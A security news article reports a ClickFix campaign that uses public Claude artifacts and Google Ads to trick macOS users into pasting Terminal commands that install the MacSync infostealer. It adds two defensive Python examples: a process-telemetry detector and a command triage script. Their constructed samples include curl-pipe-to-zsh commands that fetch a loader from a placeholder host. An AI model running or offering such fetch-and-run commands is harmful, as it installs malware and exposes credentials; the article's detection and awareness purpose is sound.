ClickFix Campaign Exploits Claude Artifacts and Google Ads to Deploy MacSync Infostealer on macOS

By Ash K

Threat actors are leveraging public Claude artifacts and malicious Google Ads in an evolving ClickFix campaign designed to compromise macOS users. Researchers from Moonlock Lab and AdGuard report that attackers are tricking victims into copying and pasting malicious shell commands into Terminal, ultimately installing the MacSync infostealer.

The campaign blends social engineering with search engine manipulation, directing users to what appear to be legitimate troubleshooting guides or support instructions. Instead of solving technical issues, these guides deliver malware through carefully disguised command-line payloads.

Analysts observed thousands of views on the malicious instructions, indicating that the campaign has achieved significant reach.

From Google Search to Terminal Execution

Malicious Google Search results reportedly lead users either to public Claude artifacts or to fake Apple Support-style pages. These pages instruct users to run Terminal commands under the guise of resolving system errors or enabling software features.

The attack relies heavily on trust. By hosting content on legitimate-looking platforms and embedding it in search results, threat actors reduce suspicion and increase the likelihood that users will follow the instructions.

Once the victim copies the command into Terminal, the compromise begins.

Two Variants, One Objective

Researchers identified at least two primary attack variants. One embeds the entire payload as a base64 blob and pipes it straight into zsh, in the form echo "..." | base64 -D | zsh (on macOS, base64 -D is the decode flag). Because the victim sees only the encoded blob, neither the script nor the server it contacts is visible before it runs.

The second variant pipes the response of a curl request directly into zsh (curl ... | zsh), so the fetched script executes without ever being saved to a file the user could inspect, a technique frequently seen in macOS-targeted malware campaigns.

Despite differences in delivery method, both approaches ultimately download and execute a loader responsible for installing the MacSync infostealer.

Both variants were observed retrieving second-stage components from the same command-and-control infrastructure.

Inside the MacSync Infostealer

Once deployed, MacSync leverages AppleScript to access sensitive data stored on the infected device. This includes macOS Keychain credentials, browser-stored passwords, session cookies, and cryptocurrency wallet data.

Infostealers targeting macOS have grown more sophisticated in recent years, reflecting the increasing value of Apple user ecosystems to cybercriminal groups.

By harvesting session cookies and authentication tokens, attackers can replay already-authenticated sessions and so sidestep multi-factor authentication, which only protects the login step; stolen wallet credentials can be monetized directly.
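The execution chain the report describes (a Terminal shell, a second shell reading a decoded or downloaded stage from a pipe, then AppleScript-based collection), as an added detection example that is not from the article or from Moonlock Lab or AdGuard. The process-exec records below are constructed, with assumed field names, in the shape an EDR or Endpoint Security Framework pipeline might emit; the rule flags a shell that is fed from a pipe by base64 or curl and checks whether osascript (the command-line AppleScript runner, assumed here to be how MacSync's AppleScript is invoked) appears beneath it. PIDs, timestamps and the example.invalid host are invented.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-exec record. Field names are assumed for this example."""
    ts: float      # seconds since epoch
    pid: int
    ppid: int
    name: str      # basename of the executable
    argv: tuple    # full argument vector, argv[0] included


SHELLS = {"zsh", "bash", "sh"}
WINDOW = 5.0  # seconds: pipeline stages are forked together by the parent shell


def is_stage(ev: ProcEvent) -> bool:
    """base64 in decode mode, or curl: the stage that feeds the pipe."""
    if ev.name == "base64":
        return any(a in ("-D", "-d", "--decode") for a in ev.argv[1:])
    return ev.name == "curl"


def is_stdin_shell(ev: ProcEvent) -> bool:
    """A shell with no script path and no -c can only be reading commands from stdin.
    Login shells (argv[0] starting with '-') are the interactive Terminal shell, not a stage."""
    if ev.name not in SHELLS or ev.argv[0].startswith("-"):
        return False
    return not [a for a in ev.argv[1:] if a != "-s"]  # -s explicitly means "read stdin"


def detect_clickfix_chain(events: List[ProcEvent]) -> List[dict]:
    """Flag a parent that forked a stage (base64 -D / curl) and a stdin-fed shell within
    WINDOW seconds, and record whether osascript ran anywhere beneath that shell."""
    by_parent: Dict[int, List[ProcEvent]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_parent.setdefault(ev.ppid, []).append(ev)

    findings = []
    for ppid, children in by_parent.items():
        stages = [c for c in children if is_stage(c)]
        for sh in (c for c in children if is_stdin_shell(c)):
            near = [s for s in stages if abs(s.ts - sh.ts) <= WINDOW]
            if not near:
                continue
            finding = {"parent_pid": ppid, "shell_pid": sh.pid,
                       "stages": [" ".join(s.argv) for s in near], "osascript": False}
            stack = [sh.pid]  # walk every descendant of the stdin-fed shell
            while stack:
                for c in by_parent.get(stack.pop(), []):
                    if c.name == "osascript":
                        finding["osascript"] = True
                    stack.append(c.pid)
            findings.append(finding)
    return findings


# Constructed telemetry (not real logs). PIDs, times and the host are invented.
EVENTS = [
    ProcEvent(1000.0, 501, 500, "zsh", ("-zsh",)),                 # interactive shell in Terminal
    # victim pastes: echo "..." | base64 -D | zsh
    ProcEvent(1030.0, 510, 501, "base64", ("base64", "-D")),
    ProcEvent(1030.0, 511, 501, "zsh", ("zsh",)),                  # shell reading the decoded stage
    # decoded stage, now running inside pid 511: curl ... | zsh
    ProcEvent(1030.4, 512, 511, "curl", ("curl", "-fsSL", "http://example.invalid/loader.sh")),
    ProcEvent(1030.5, 513, 511, "zsh", ("zsh",)),
    ProcEvent(1031.2, 514, 513, "osascript", ("osascript", "-e", "<script body not shown>")),
    # benign activity in the same Terminal an hour later: decoding a file, running a script by path
    ProcEvent(4600.0, 520, 501, "base64", ("base64", "-D", "-i", "note.b64")),
    ProcEvent(4600.3, 521, 501, "zsh", ("zsh", "./build.sh")),
]

if __name__ == "__main__":
    for f in detect_clickfix_chain(EVENTS):
        print(f)
```

On the constructed data the rule yields two findings, one per pipe-fed shell (pid 511 under the Terminal shell, pid 513 under the first stage), both with osascript beneath them, and ignores the later base64 and zsh invocations because the shell there was given a script path. The heuristic keys on what a pasted pipeline looks like in process telemetry: the interactive shell forks the stages as siblings, so the pipe itself is never in any single command line.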

Indicators Point to a Single Actor

Moonlock Lab and AdGuard researchers observed view counts between 12,300 and 15,600 on the malicious guides, suggesting sustained exposure.

Technical analysis revealed that both identified variants retrieved second-stage payloads from the same command-and-control servers, strongly indicating the activity is linked to a single threat actor or coordinated group.

The consistency in infrastructure, payload design, and social engineering themes supports this attribution hypothesis.

Defensive Recommendations for macOS Users

Security experts stress that users should never execute unfamiliar Terminal commands provided by web pages, especially when prompted through search results or unofficial guides.

Before running any command, users are advised to verify its legitimacy through trusted documentation or by consulting a reputable security resource.

A safer habit is to paste the suspicious command into a trusted analysis tool, or to decode it without executing it, for example by running the base64 decoding step on its own without the trailing | zsh and reading the result, before anything reaches the shell. Asking an AI assistant to explain a command can help, but the Claude artifact that presented it is attacker-authored content, not a session the victim controls, and should not be treated as a second opinion.
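The two variants described earlier (the base64 pipe and the curl pipe) and the advice above to inspect a command rather than run it, as one added example that is not from the article or from Moonlock Lab or AdGuard: a small Python triage script that recognizes both shapes, decodes the base64 stage without executing anything, and lists every URL it finds in the outer command or the decoded stage. The sample commands, the example.invalid host and the exact quoting and flag forms the regexes accept are constructed for this example.

```python
import base64
import binascii
import re

# The two ClickFix shapes the report describes. The exact quoting, flags and
# shell name are assumptions; the patterns accept the common variations.
B64_PIPE_RE = re.compile(
    r"""echo\s+(['"]?)(?P<blob>[A-Za-z0-9+/=\s]+)\1\s*\|\s*base64\s+(?:-[dD]|--decode)\s*\|\s*(?:zsh|bash|sh)\b"""
)
CURL_PIPE_RE = re.compile(r"curl\b[^|]*\|\s*(?:zsh|bash|sh)\b")
SHELL_PIPE_RE = re.compile(r"\|\s*(?:zsh|bash|sh)\b")
URL_RE = re.compile(r"""https?://[^\s'"|;&)]+""")


def decode_b64_stage(blob: str) -> str:
    """Decode a base64 stage to text without running it; '' if it is not valid base64."""
    cleaned = re.sub(r"\s+", "", blob)
    try:
        raw = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-8", errors="replace")


def triage_clickfix(command: str) -> dict:
    """Classify a pasted Terminal command and show what it would do.

    variant:        'base64_pipe', 'curl_pipe' or 'unknown'
    pipes_to_shell: True if anything is piped into zsh/bash/sh
    decoded:        the inner script for the base64 variant (text only, never executed)
    urls:           every URL in the outer command or the decoded stage
    """
    result = {"variant": "unknown", "pipes_to_shell": False, "decoded": "", "urls": []}
    m = B64_PIPE_RE.search(command)
    if m:
        result["variant"] = "base64_pipe"
        result["decoded"] = decode_b64_stage(m.group("blob"))
    elif CURL_PIPE_RE.search(command):
        result["variant"] = "curl_pipe"
    result["pipes_to_shell"] = bool(SHELL_PIPE_RE.search(command))
    urls = []
    for text in (command, result["decoded"]):
        for url in URL_RE.findall(text):
            if url not in urls:
                urls.append(url)
    result["urls"] = urls
    return result


# Constructed samples: example.invalid is a reserved name, not a real server.
SAMPLE_INNER = "curl -fsSL http://example.invalid/loader.sh | zsh"
SAMPLE_V1 = 'echo "%s" | base64 -D | zsh' % base64.b64encode(SAMPLE_INNER.encode()).decode()
SAMPLE_V2 = "curl -fsSL http://example.invalid/fix.sh | zsh"
SAMPLE_BENIGN = "ls -la ~/Downloads"

if __name__ == "__main__":
    for cmd in (SAMPLE_V1, SAMPLE_V2, SAMPLE_BENIGN):
        print(cmd)
        print("  ->", triage_clickfix(cmd))
```

Run on the first sample, the script reports base64_pipe, prints the decoded inner command (which is itself the curl-pipe variant) and surfaces the loader URL that the encoding hid from the victim; on the second it reports curl_pipe and the URL; the benign command is left unclassified. The point is that the decode happens in Python and is never handed to a shell, which is exactly what the original command line is built to do.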

As attackers increasingly weaponize legitimate AI platforms and search advertising channels, vigilance at the user level remains a critical line of defense.

Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.